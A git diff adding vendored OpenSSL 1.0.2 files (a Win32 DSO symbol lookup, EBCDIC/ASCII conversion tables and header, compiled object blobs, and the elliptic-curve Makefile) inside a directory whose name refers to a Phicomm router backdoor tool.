+        DSOerr(DSO_F_WIN32_GLOBALLOOKUP, DSO_R_UNSUPPORTED);
+        return NULL;
+    }
+    /* We take the rest for granted... */
+# ifdef _WIN32_WCE
+    close_snap = (CLOSETOOLHELP32SNAPSHOT)
+        GetProcAddress(dll, "CloseToolhelp32Snapshot");
+# else
+    close_snap = (CLOSETOOLHELP32SNAPSHOT) CloseHandle;
+# endif
+    module_first = (MODULE32) GetProcAddress(dll, "Module32First");
+    module_next = (MODULE32) GetProcAddress(dll, "Module32Next");
+
+    hModuleSnap = (*create_snap) (TH32CS_SNAPMODULE, 0);
+    if (hModuleSnap == INVALID_HANDLE_VALUE) {
+        FreeLibrary(dll);
+        DSOerr(DSO_F_WIN32_GLOBALLOOKUP, DSO_R_UNSUPPORTED);
+        return NULL;
+    }
+
+    me32.dwSize = sizeof(me32);
+
+    if (!(*module_first) (hModuleSnap, &me32)) {
+        (*close_snap) (hModuleSnap);
+        FreeLibrary(dll);
+        return NULL;
+    }
+
+    do {
+        if ((ret = GetProcAddress(me32.hModule, name))) {
+            (*close_snap) (hModuleSnap);
+            FreeLibrary(dll);
+            return ret;
+        }
+    } while ((*module_next) (hModuleSnap, &me32));
+
+    (*close_snap) (hModuleSnap);
+    FreeLibrary(dll);
+    return NULL;
+}
+#endif                          /* DSO_WIN32 */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_win32.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/dso_win32.o
new file mode 100644
index 0000000000000000000000000000000000000000..31c3f52892e81b0429b52e5da1d795518c0ebcf9
GIT binary patch
literal 1368
zcmbtS$w~u35Up|C7hLclL?oV6)FyF3^dJF^@!$e3;6=hDjtiQJ%ycmEpugbJPw^;t
z@e}+E#hVwc%2bb?cJQDDJ+JC@z3Qs&xy^2@HCYxYvtSv%BgFz7G=2M-x|@M+=z{m&
zk&pD_6XaG_mXhQ9g^DLD$we_MQq$>$N<B>9%%ntWZX%?)OfzC1t`=Omt$o1qkHp!y
z$Oc0I>v{*QYM+(pZfn28#)u#0y*9?*fM#iix6im7J9bj)K^s;R+EI5JiLPCrqLHJ>
zhSr~CosaL_#!gM^L1IAbGg2M}<^0u|H#;MWu)4dQ-^}i<Z?A?FYLZ-tCTW;P1htZM
z3LpaMhj^+y=~g9(BS$(Q3PAv(ST2=Z4>_+aU4hRu9Z08m&hd#?5tn}X()DExgzsKB
z!adC&`%cN_!~X#Z)Y99TH<;m?(LHcXxw?&FK%DxY)Lu?G2AcXY+;7MASN#-fsb&h7
zZtDC=okU-quW(-D^i*FDG+*fyl|_f{sNwA~u5v<>Q31`W+aU&2)70N{k~x>DKfpZt
zn=_oR;Ds9<Vxj|)`c!(w$DK`*XZoPMh5((2RKwI0XTBXt9{Btb3N&LnV*1gG)4y`!
KNt78nrv3{~=}y=H

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ebcdic.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ebcdic.c
new file mode 100644
index 0000000..4b7652c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ebcdic.c
@@ -0,0 +1,284 @@
+/* crypto/ebcdic.c */
+
+#ifndef CHARSET_EBCDIC
+
+# include <openssl/e_os2.h>
+# if defined(PEDANTIC) || defined(__DECC) || defined(OPENSSL_SYS_MACOSX)
+static void *dummy = &dummy;
+# endif
+
+#else                           /* CHARSET_EBCDIC */
+
+# include "ebcdic.h"
+/*-
+ *      Initial Port for  Apache-1.3     by <Martin.Kraemer@Mch.SNI.De>
+ *      Adapted for       OpenSSL-0.9.4  by <Martin.Kraemer@Mch.SNI.De>
+ */
+
+# ifdef _OSD_POSIX
+/*
+ * "BS2000 OSD" is a POSIX subsystem on a main frame. It is made by Siemens
+ * AG, Germany, for their BS2000 mainframe machines. Within the POSIX
+ * subsystem, the same character set was chosen as in "native BS2000", namely
+ * EBCDIC. (EDF04)
+ *
+ * The name "ASCII" in these routines is misleading: actually, conversion is
+ * not between EBCDIC and ASCII, but EBCDIC(EDF04) and ISO-8859.1; that means
+ * that (western european) national characters are preserved.
+ *
+ * This table is identical to the one used by rsh/rcp/ftp and other POSIX
+ * tools.
+ */
+
+/* Here's the bijective ebcdic-to-ascii table: */
+const unsigned char os_toascii[256] = {
+    /*
+     * 00
+     */ 0x00, 0x01, 0x02, 0x03, 0x85, 0x09, 0x86, 0x7f,
+    0x87, 0x8d, 0x8e, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, /* ................ */
+    /*
+     * 10
+     */ 0x10, 0x11, 0x12, 0x13, 0x8f, 0x0a, 0x08, 0x97,
+    0x18, 0x19, 0x9c, 0x9d, 0x1c, 0x1d, 0x1e, 0x1f, /* ................ */
+    /*
+     * 20
+     */ 0x80, 0x81, 0x82, 0x83, 0x84, 0x92, 0x17, 0x1b,
+    0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x05, 0x06, 0x07, /* ................ */
+    /*
+     * 30
+     */ 0x90, 0x91, 0x16, 0x93, 0x94, 0x95, 0x96, 0x04,
+    0x98, 0x99, 0x9a, 0x9b, 0x14, 0x15, 0x9e, 0x1a, /* ................ */
+    /*
+     * 40
+     */ 0x20, 0xa0, 0xe2, 0xe4, 0xe0, 0xe1, 0xe3, 0xe5,
+    0xe7, 0xf1, 0x60, 0x2e, 0x3c, 0x28, 0x2b, 0x7c, /* .........`.<(+| */
+    /*
+     * 50
+     */ 0x26, 0xe9, 0xea, 0xeb, 0xe8, 0xed, 0xee, 0xef,
+    0xec, 0xdf, 0x21, 0x24, 0x2a, 0x29, 0x3b, 0x9f, /* &.........!$*);. */
+    /*
+     * 60
+     */ 0x2d, 0x2f, 0xc2, 0xc4, 0xc0, 0xc1, 0xc3, 0xc5,
+    0xc7, 0xd1, 0x5e, 0x2c, 0x25, 0x5f, 0x3e, 0x3f,    /*-/........^,%_>?*/
+    /*
+     * 70
+     */ 0xf8, 0xc9, 0xca, 0xcb, 0xc8, 0xcd, 0xce, 0xcf,
+    0xcc, 0xa8, 0x3a, 0x23, 0x40, 0x27, 0x3d, 0x22, /* ..........:#@'=" */
+    /*
+     * 80
+     */ 0xd8, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67,
+    0x68, 0x69, 0xab, 0xbb, 0xf0, 0xfd, 0xfe, 0xb1, /* .abcdefghi...... */
+    /*
+     * 90
+     */ 0xb0, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f, 0x70,
+    0x71, 0x72, 0xaa, 0xba, 0xe6, 0xb8, 0xc6, 0xa4, /* .jklmnopqr...... */
+    /*
+     * a0
+     */ 0xb5, 0xaf, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78,
+    0x79, 0x7a, 0xa1, 0xbf, 0xd0, 0xdd, 0xde, 0xae, /* ..stuvwxyz...... */
+    /*
+     * b0
+     */ 0xa2, 0xa3, 0xa5, 0xb7, 0xa9, 0xa7, 0xb6, 0xbc,
+    0xbd, 0xbe, 0xac, 0x5b, 0x5c, 0x5d, 0xb4, 0xd7, /* ...........[\].. */
+    /*
+     * c0
+     */ 0xf9, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47,
+    0x48, 0x49, 0xad, 0xf4, 0xf6, 0xf2, 0xf3, 0xf5, /* .ABCDEFGHI...... */
+    /*
+     * d0
+     */ 0xa6, 0x4a, 0x4b, 0x4c, 0x4d, 0x4e, 0x4f, 0x50,
+    0x51, 0x52, 0xb9, 0xfb, 0xfc, 0xdb, 0xfa, 0xff, /* .JKLMNOPQR...... */
+    /*
+     * e0
+     */ 0xd9, 0xf7, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58,
+    0x59, 0x5a, 0xb2, 0xd4, 0xd6, 0xd2, 0xd3, 0xd5, /* ..STUVWXYZ...... */
+    /*
+     * f0
+     */ 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
+    0x38, 0x39, 0xb3, 0x7b, 0xdc, 0x7d, 0xda, 0x7e /* 0123456789.{.}.~ */
+};
+
+/* The ascii-to-ebcdic table: */
+const unsigned char os_toebcdic[256] = {
+    /*
+     * 00
+     */ 0x00, 0x01, 0x02, 0x03, 0x37, 0x2d, 0x2e, 0x2f,
+    0x16, 0x05, 0x15, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, /* ................ */
+    /*
+     * 10
+     */ 0x10, 0x11, 0x12, 0x13, 0x3c, 0x3d, 0x32, 0x26,
+    0x18, 0x19, 0x3f, 0x27, 0x1c, 0x1d, 0x1e, 0x1f, /* ................ */
+    /*
+     * 20
+     */ 0x40, 0x5a, 0x7f, 0x7b, 0x5b, 0x6c, 0x50, 0x7d,
+    0x4d, 0x5d, 0x5c, 0x4e, 0x6b, 0x60, 0x4b, 0x61, /* !"#$%&'()*+,-./ */
+    /*
+     * 30
+     */ 0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7,
+    0xf8, 0xf9, 0x7a, 0x5e, 0x4c, 0x7e, 0x6e, 0x6f, /* 0123456789:;<=>? */
+    /*
+     * 40
+     */ 0x7c, 0xc1, 0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7,
+    0xc8, 0xc9, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, /* @ABCDEFGHIJKLMNO */
+    /*
+     * 50
+     */ 0xd7, 0xd8, 0xd9, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6,
+    0xe7, 0xe8, 0xe9, 0xbb, 0xbc, 0xbd, 0x6a, 0x6d, /* PQRSTUVWXYZ[\]^_ */
+    /*
+     * 60
+     */ 0x4a, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87,
+    0x88, 0x89, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, /* `abcdefghijklmno */
+    /*
+     * 70
+     */ 0x97, 0x98, 0x99, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6,
+    0xa7, 0xa8, 0xa9, 0xfb, 0x4f, 0xfd, 0xff, 0x07, /* pqrstuvwxyz{|}~. */
+    /*
+     * 80
+     */ 0x20, 0x21, 0x22, 0x23, 0x24, 0x04, 0x06, 0x08,
+    0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x09, 0x0a, 0x14, /* ................ */
+    /*
+     * 90
+     */ 0x30, 0x31, 0x25, 0x33, 0x34, 0x35, 0x36, 0x17,
+    0x38, 0x39, 0x3a, 0x3b, 0x1a, 0x1b, 0x3e, 0x5f, /* ................ */
+    /*
+     * a0
+     */ 0x41, 0xaa, 0xb0, 0xb1, 0x9f, 0xb2, 0xd0, 0xb5,
+    0x79, 0xb4, 0x9a, 0x8a, 0xba, 0xca, 0xaf, 0xa1, /* ................ */
+    /*
+     * b0
+     */ 0x90, 0x8f, 0xea, 0xfa, 0xbe, 0xa0, 0xb6, 0xb3,
+    0x9d, 0xda, 0x9b, 0x8b, 0xb7, 0xb8, 0xb9, 0xab, /* ................ */
+    /*
+     * c0
+     */ 0x64, 0x65, 0x62, 0x66, 0x63, 0x67, 0x9e, 0x68,
+    0x74, 0x71, 0x72, 0x73, 0x78, 0x75, 0x76, 0x77, /* ................ */
+    /*
+     * d0
+     */ 0xac, 0x69, 0xed, 0xee, 0xeb, 0xef, 0xec, 0xbf,
+    0x80, 0xe0, 0xfe, 0xdd, 0xfc, 0xad, 0xae, 0x59, /* ................ */
+    /*
+     * e0
+     */ 0x44, 0x45, 0x42, 0x46, 0x43, 0x47, 0x9c, 0x48,
+    0x54, 0x51, 0x52, 0x53, 0x58, 0x55, 0x56, 0x57, /* ................ */
+    /*
+     * f0
+     */ 0x8c, 0x49, 0xcd, 0xce, 0xcb, 0xcf, 0xcc, 0xe1,
+    0x70, 0xc0, 0xde, 0xdb, 0xdc, 0x8d, 0x8e, 0xdf /* ................ */
+};
+
+# else /*_OSD_POSIX*/
+
+/*
+ * This code does basic character mapping for IBM's TPF and OS/390 operating
+ * systems. It is a modified version of the BS2000 table.
+ *
+ * Bijective EBCDIC (character set IBM-1047) to US-ASCII table: This table is
+ * bijective - there are no ambigous or duplicate characters.
+ */
+const unsigned char os_toascii[256] = {
+    0x00, 0x01, 0x02, 0x03, 0x85, 0x09, 0x86, 0x7f, /* 00-0f: */
+    0x87, 0x8d, 0x8e, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, /* ................ */
+    0x10, 0x11, 0x12, 0x13, 0x8f, 0x0a, 0x08, 0x97, /* 10-1f: */
+    0x18, 0x19, 0x9c, 0x9d, 0x1c, 0x1d, 0x1e, 0x1f, /* ................ */
+    0x80, 0x81, 0x82, 0x83, 0x84, 0x92, 0x17, 0x1b, /* 20-2f: */
+    0x88, 0x89, 0x8a, 0x8b, 0x8c, 0x05, 0x06, 0x07, /* ................ */
+    0x90, 0x91, 0x16, 0x93, 0x94, 0x95, 0x96, 0x04, /* 30-3f: */
+    0x98, 0x99, 0x9a, 0x9b, 0x14, 0x15, 0x9e, 0x1a, /* ................ */
+    0x20, 0xa0, 0xe2, 0xe4, 0xe0, 0xe1, 0xe3, 0xe5, /* 40-4f: */
+    0xe7, 0xf1, 0xa2, 0x2e, 0x3c, 0x28, 0x2b, 0x7c, /* ...........<(+| */
+    0x26, 0xe9, 0xea, 0xeb, 0xe8, 0xed, 0xee, 0xef, /* 50-5f: */
+    0xec, 0xdf, 0x21, 0x24, 0x2a, 0x29, 0x3b, 0x5e, /* &.........!$*);^ */
+    0x2d, 0x2f, 0xc2, 0xc4, 0xc0, 0xc1, 0xc3, 0xc5, /* 60-6f: */
+    0xc7, 0xd1, 0xa6, 0x2c, 0x25, 0x5f, 0x3e, 0x3f, /* -/.........,%_>? */
+    0xf8, 0xc9, 0xca, 0xcb, 0xc8, 0xcd, 0xce, 0xcf, /* 70-7f: */
+    0xcc, 0x60, 0x3a, 0x23, 0x40, 0x27, 0x3d, 0x22, /* .........`:#@'=" */
+    0xd8, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, /* 80-8f: */
+    0x68, 0x69, 0xab, 0xbb, 0xf0, 0xfd, 0xfe, 0xb1, /* .abcdefghi...... */
+    0xb0, 0x6a, 0x6b, 0x6c, 0x6d, 0x6e, 0x6f, 0x70, /* 90-9f: */
+    0x71, 0x72, 0xaa, 0xba, 0xe6, 0xb8, 0xc6, 0xa4, /* .jklmnopqr...... */
+    0xb5, 0x7e, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, /* a0-af: */
+    0x79, 0x7a, 0xa1, 0xbf, 0xd0, 0x5b, 0xde, 0xae, /* .~stuvwxyz...[.. */
+    0xac, 0xa3, 0xa5, 0xb7, 0xa9, 0xa7, 0xb6, 0xbc, /* b0-bf: */
+    0xbd, 0xbe, 0xdd, 0xa8, 0xaf, 0x5d, 0xb4, 0xd7, /* .............].. */
+    0x7b, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, /* c0-cf: */
+    0x48, 0x49, 0xad, 0xf4, 0xf6, 0xf2, 0xf3, 0xf5, /* {ABCDEFGHI...... */
+    0x7d, 0x4a, 0x4b, 0x4c, 0x4d, 0x4e, 0x4f, 0x50, /* d0-df: */
+    0x51, 0x52, 0xb9, 0xfb, 0xfc, 0xf9, 0xfa, 0xff, /* }JKLMNOPQR...... */
+    0x5c, 0xf7, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, /* e0-ef: */
+    0x59, 0x5a, 0xb2, 0xd4, 0xd6, 0xd2, 0xd3, 0xd5, /* \.STUVWXYZ...... */
+    0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, /* f0-ff: */
+    0x38, 0x39, 0xb3, 0xdb, 0xdc, 0xd9, 0xda, 0x9f /* 0123456789...... */
+};
+
+/*
+ * The US-ASCII to EBCDIC (character set IBM-1047) table: This table is
+ * bijective (no ambiguous or duplicate characters)
+ */
+const unsigned char os_toebcdic[256] = {
+    0x00, 0x01, 0x02, 0x03, 0x37, 0x2d, 0x2e, 0x2f, /* 00-0f: */
+    0x16, 0x05, 0x15, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, /* ................ */
+    0x10, 0x11, 0x12, 0x13, 0x3c, 0x3d, 0x32, 0x26, /* 10-1f: */
+    0x18, 0x19, 0x3f, 0x27, 0x1c, 0x1d, 0x1e, 0x1f, /* ................ */
+    0x40, 0x5a, 0x7f, 0x7b, 0x5b, 0x6c, 0x50, 0x7d, /* 20-2f: */
+    0x4d, 0x5d, 0x5c, 0x4e, 0x6b, 0x60, 0x4b, 0x61, /* !"#$%&'()*+,-./ */
+    0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 0xf7, /* 30-3f: */
+    0xf8, 0xf9, 0x7a, 0x5e, 0x4c, 0x7e, 0x6e, 0x6f, /* 0123456789:;<=>? */
+    0x7c, 0xc1, 0xc2, 0xc3, 0xc4, 0xc5, 0xc6, 0xc7, /* 40-4f: */
+    0xc8, 0xc9, 0xd1, 0xd2, 0xd3, 0xd4, 0xd5, 0xd6, /* @ABCDEFGHIJKLMNO */
+    0xd7, 0xd8, 0xd9, 0xe2, 0xe3, 0xe4, 0xe5, 0xe6, /* 50-5f: */
+    0xe7, 0xe8, 0xe9, 0xad, 0xe0, 0xbd, 0x5f, 0x6d, /* PQRSTUVWXYZ[\]^_ */
+    0x79, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, /* 60-6f: */
+    0x88, 0x89, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, /* `abcdefghijklmno */
+    0x97, 0x98, 0x99, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, /* 70-7f: */
+    0xa7, 0xa8, 0xa9, 0xc0, 0x4f, 0xd0, 0xa1, 0x07, /* pqrstuvwxyz{|}~. */
+    0x20, 0x21, 0x22, 0x23, 0x24, 0x04, 0x06, 0x08, /* 80-8f: */
+    0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x09, 0x0a, 0x14, /* ................ */
+    0x30, 0x31, 0x25, 0x33, 0x34, 0x35, 0x36, 0x17, /* 90-9f: */
+    0x38, 0x39, 0x3a, 0x3b, 0x1a, 0x1b, 0x3e, 0xff, /* ................ */
+    0x41, 0xaa, 0x4a, 0xb1, 0x9f, 0xb2, 0x6a, 0xb5, /* a0-af: */
+    0xbb, 0xb4, 0x9a, 0x8a, 0xb0, 0xca, 0xaf, 0xbc, /* ................ */
+    0x90, 0x8f, 0xea, 0xfa, 0xbe, 0xa0, 0xb6, 0xb3, /* b0-bf: */
+    0x9d, 0xda, 0x9b, 0x8b, 0xb7, 0xb8, 0xb9, 0xab, /* ................ */
+    0x64, 0x65, 0x62, 0x66, 0x63, 0x67, 0x9e, 0x68, /* c0-cf: */
+    0x74, 0x71, 0x72, 0x73, 0x78, 0x75, 0x76, 0x77, /* ................ */
+    0xac, 0x69, 0xed, 0xee, 0xeb, 0xef, 0xec, 0xbf, /* d0-df: */
+    0x80, 0xfd, 0xfe, 0xfb, 0xfc, 0xba, 0xae, 0x59, /* ................ */
+    0x44, 0x45, 0x42, 0x46, 0x43, 0x47, 0x9c, 0x48, /* e0-ef: */
+    0x54, 0x51, 0x52, 0x53, 0x58, 0x55, 0x56, 0x57, /* ................ */
+    0x8c, 0x49, 0xcd, 0xce, 0xcb, 0xcf, 0xcc, 0xe1, /* f0-ff: */
+    0x70, 0xdd, 0xde, 0xdb, 0xdc, 0x8d, 0x8e, 0xdf /* ................ */
+};
+# endif/*_OSD_POSIX*/
+
+/*
+ * Translate a memory block from EBCDIC (host charset) to ASCII (net charset)
+ * dest and srce may be identical, or separate memory blocks, but should not
+ * overlap. These functions intentionally have an interface compatible to
+ * memcpy(3).
+ */
+
+void *ebcdic2ascii(void *dest, const void *srce, size_t count)
+{
+    unsigned char *udest = dest;
+    const unsigned char *usrce = srce;
+
+    while (count-- != 0) {
+        *udest++ = os_toascii[*usrce++];
+    }
+
+    return dest;
+}
+
+void *ascii2ebcdic(void *dest, const void *srce, size_t count)
+{
+    unsigned char *udest = dest;
+    const unsigned char *usrce = srce;
+
+    while (count-- != 0) {
+        *udest++ = os_toebcdic[*usrce++];
+    }
+
+    return dest;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ebcdic.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ebcdic.h
new file mode 100644
index 0000000..4cbdfeb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ebcdic.h
@@ -0,0 +1,26 @@
+/* crypto/ebcdic.h */
+
+#ifndef HEADER_EBCDIC_H
+# define HEADER_EBCDIC_H
+
+# include <sys/types.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* Avoid name clashes with other applications */
+# define os_toascii   _openssl_os_toascii
+# define os_toebcdic  _openssl_os_toebcdic
+# define ebcdic2ascii _openssl_ebcdic2ascii
+# define ascii2ebcdic _openssl_ascii2ebcdic
+
+extern const unsigned char os_toascii[256];
+extern const unsigned char os_toebcdic[256];
+void *ebcdic2ascii(void *dest, const void *srce, size_t count);
+void *ascii2ebcdic(void *dest, const void *srce, size_t count);
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ebcdic.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ebcdic.o
new file mode 100644
index 0000000000000000000000000000000000000000..53c7c217b27aa1a5471b346f08eca2211a43278e
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`ES5JBqyu_1=c1is}^dNy!dlB(c5N}BuR7yTbHefIM7yLOM`<MI$
zI+N_;vYUG7z~t?`eQ$QMX+K7Hw;jg;6%O3MU!_=pFOBqT+J_!&0gQ*kYxi&xR;j4m
zD}Khk{@}8z%fb7p$G!8ThHiRw5w<bcFvs^3=m0E;W0?O19p8oTpEeC^otS!J_m*Hw
zPGj{{wt>OAO(Mf^A}iuBn!ZLn0^sF55kZJ3iUwcQO2lsh_%sj!@USd_M_H1@DROBh
zVvZNnFGUc|Wc{30JTJ05F2vkAa5Z8NZFHyRoB2!HX`jDV?BkO-^Sk-=uKh6m2PoOZ
zT-ASqUh3&#>fy`cSSN9<&R2M$ak_M-7us6+6g9%d2B!H7%ca1TsDR#859()nY5!A-
p781#)lBiwD<3G>3JKB1XgZ89OfjR#UZkTsZ+9xS|R7Q!W{};^ZIJN))

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/Makefile
new file mode 100644
index 0000000..ca44304
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/Makefile
@@ -0,0 +1,271 @@
+#
+# crypto/ec/Makefile
+#
+
+DIR=	ec
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=ectest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	ec_lib.c ecp_smpl.c ecp_mont.c ecp_nist.c ec_cvt.c ec_mult.c\
+	ec_err.c ec_curve.c ec_check.c ec_print.c ec_asn1.c ec_key.c\
+	ec2_smpl.c ec2_mult.c ec_ameth.c ec_pmeth.c eck_prn.c \
+	ecp_nistp224.c ecp_nistp256.c ecp_nistp521.c ecp_nistputil.c \
+	ecp_oct.c ec2_oct.c ec_oct.c
+
+LIBOBJ=	ec_lib.o ecp_smpl.o ecp_mont.o ecp_nist.o ec_cvt.o ec_mult.o\
+	ec_err.o ec_curve.o ec_check.o ec_print.o ec_asn1.o ec_key.o\
+	ec2_smpl.o ec2_mult.o ec_ameth.o ec_pmeth.o eck_prn.o \
+	ecp_nistp224.o ecp_nistp256.o ecp_nistp521.o ecp_nistputil.o \
+	ecp_oct.o ec2_oct.o ec_oct.o $(EC_ASM)
+
+SRC= $(LIBSRC)
+
+EXHEADER= ec.h
+HEADER=	ec_lcl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+ecp_nistz256-x86_64.s: asm/ecp_nistz256-x86_64.pl
+	$(PERL) asm/ecp_nistz256-x86_64.pl $(PERLASM_SCHEME) > $@
+
+ecp_nistz256-avx2.s:   asm/ecp_nistz256-avx2.pl
+	$(PERL) asm/ecp_nistz256-avx2.pl $(PERLASM_SCHEME) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+ec2_mult.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec2_mult.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec2_mult.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec2_mult.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec2_mult.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec2_mult.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec2_mult.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec2_mult.o: ../../include/openssl/symhacks.h ec2_mult.c ec_lcl.h
+ec2_oct.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec2_oct.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec2_oct.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec2_oct.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec2_oct.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec2_oct.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec2_oct.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec2_oct.o: ../../include/openssl/symhacks.h ec2_oct.c ec_lcl.h
+ec2_smpl.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+ec2_smpl.o: ../../include/openssl/bn.h ../../include/openssl/crypto.h
+ec2_smpl.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec2_smpl.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec2_smpl.o: ../../include/openssl/obj_mac.h ../../include/openssl/opensslconf.h
+ec2_smpl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec2_smpl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ec2_smpl.o: ../../include/openssl/symhacks.h ec2_smpl.c ec_lcl.h
+ec_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+ec_ameth.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+ec_ameth.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+ec_ameth.o: ../../include/openssl/cms.h ../../include/openssl/crypto.h
+ec_ameth.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+ec_ameth.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+ec_ameth.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+ec_ameth.o: ../../include/openssl/opensslconf.h
+ec_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ec_ameth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+ec_ameth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ec_ameth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+ec_ameth.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+ec_ameth.o: ec_ameth.c
